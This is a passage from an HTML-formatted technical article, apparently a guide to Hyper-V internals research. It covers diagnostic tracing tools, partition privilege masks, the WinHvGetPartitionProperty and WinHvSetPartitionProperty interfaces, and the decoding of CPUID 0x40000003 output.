591px; overflow: hidden; width: 393px;"><img height="591" src="https://lh5.googleusercontent.com/s8I9a1WYDhbF2MYnFW7TmWmCThktl7EyN2EMqP8Z3hhZvGa9vnY66Np8b-TxPPIwQLbC7YAWkAonMR5D7W0EkAMIzq_S9jgRYJ_9i_GTPtLNB1wT2wXdG-D2YoR_V_AnCKXDVyslWfweVFZO_A" style="margin-left: 0px; margin-top: 0px;" width="393" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DrvMon – you can see communication between kernel mode and usermode Hyper-V components</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 252px; overflow: hidden; width: 458px;"><img height="252" src="https://lh6.googleusercontent.com/JAkJqGi_4eiC1x3wBHoF083FN70DveTE7G3wPPQx922jYzjvds4n1HSlixxHdCpyuthWrYOk2hVwLkNIjuWwWupm3_Ay3p5g0_d7G4qydjGSwxkFqKnXWXxUYRgDjO7XVysGAZupeML4zFx_8w" style="margin-left: 0px; margin-top: 0px;" width="458" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Good collection of tools from Microsoft for diagnostic:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;"><a href="https://github.com/CSS-Windows/WindowsDiag" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/CSS-Windows/WindowsDiag</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for Hyper-V can be used ETW collection tools:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMLtrace</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Fruti</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 296px; overflow: hidden; width: 406px;"><img alt="Изображение" height="296" src="https://lh4.googleusercontent.com/47B_fABpH4uaW8aYzhxg4i83DHrdrm2EKKAHpYGT5ZSdvghFFnxbT0dMcv72KfE7AV_Fmmm7VBiJCXCESOdjJjwayVzSwFrmfNW0v7qkXCZWeLpbsGfU29cI5cHgXhkRNmh-rUC9gwvMqccPDg" style="margin-left: 0px; margin-top: 0px;" width="406" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">tss_VMLverbosity.ps1</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">V_Tracing_Using_Channels.ps1</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 479px; overflow: hidden; width: 387px;"><img alt="Изображение" height="479" src="https://lh5.googleusercontent.com/PGZWh76V_3502S3aM5b2_iEiz3qvG6kXycNpFQWHu_EtdCckMV28u5jqKrShzEdal-VF6RxQWEGgT0VVIZg20rMry8cuq4Pja9kMY8D14aKwFh5brqA2h_meiL6Yh9yVZPB9mz5dZN6gdFnN0Q" style="margin-left: 0px; margin-top: 0px;" width="387" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 53.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercalls</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Latest Hypervisor Top-Level Functional Specification for Windows Server 2019 – 6.0b describes Hyper-V interfaces and internals information about part of Hyper-V components.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Each virtual machine and root OS is presented in terms of partition. Each partition has its own identifier, that must be unique on host server (64-bit size).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For each partition are given privileges to create (structure HV_PARTITION_PRIVILEGE_MASK), which determine the ability to perform specific hypercall.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Learn privileges by executing in the root-partition the following code in ring0:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionId(&PartID);// partition id</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty(PartID,</span><span face="Calibri,sans-serif" style="background-color: white; color: darkslategrey; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">HvPartitionPropertyPrivilegeFlags</span><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">,&HvProp);</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">// the result is returned in HvProp.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPartitionPropertyPrivilegeFlags – one of the enumeration values. HV_PARTITION_PROPERTY_CODE, which operate functions, exported driver winhvr.sys\winhv.sys.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty(</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_ID</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PartitionId,</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY_CODE</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyCode,</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__out PHV_PARTITION_PROPERTY</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyValue</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also, if necessary, these privileges can be changed, causing root-partition in the following function:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetPartitionProperty(</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_ID</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PartitionId,</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY_CODE</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyCode,</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyValue</span></p><p dir="ltr" style="background-color: #e6e6e6; line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value of HvPartitionPropertyPrivilegeFlags for the Windows Server 2019 root partition: 002BB9FF00003FFF</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 166px; overflow: hidden; width: 602px;"><img height="166" src="https://lh6.googleusercontent.com/k6JUfo4keMii_bntFPkDP-XN1pH9WIUUY4JivnSJIpUioUN-g17IFyLlq-wX052VVdWQgr0J-BidHtAxMpI1P4hbyFvdJCBCpD2CTOQ2KBzKfQiQLRhor0dn5u2cBYpePXxBN0hThx4OtrJCIQ" style="margin-left: 0px; margin-top: 0px;" width="602" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value of HvPartitionPropertyPrivilegeFlags for child partition 003B80B000002E7F:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 188px; overflow: hidden; width: 518px;"><img height="188" src="https://lh4.googleusercontent.com/UPqbIvM3CGZ-qv1j71SMLGwFPi3jjEnn2FaCYxDUV1EnSPCC3aeP9DiMAaEluhZnUruL3NMKf_aLH0qX6vKJ36mnjrskFwzniZQDDKnm3h7q1_33h6gKc_--ib4d3GPi2ogv9xGzZGJDIoFhwg" style="margin-left: 0px; margin-top: 0px;" width="518" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a Windows guest OS, privileges can be obtained by placing EAX 0x40000003 and following the instructions CPUID (Hyper-V TLFS 6.0b give interpretation of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">cpuid</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> result).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">CPUID 40000003 called</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EAX =00002E7F (101110 01111111) - corresponds to bits 31-0 of HV_PARTITION_PRIVILEGE_MASK</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EBX =003B8030 (111011 10000000 00110000) - corresponds to bits 63-32 of HV_PARTITION_PRIVILEGE_MASK</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ECX =00000002 (10) - Reserved</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EDX =00BED7B2 (10111110 11010111 10110010)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 1:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest debugging support is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for passing hypercall input parameter block via XMM registers is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for a virtual guest idle state is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 7:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for querying NUMA distances is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 8:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for determining timer frequencies is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 9:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for injecting synthetic machine checks is available.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 10:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for guest crash MSRs is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 12:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" 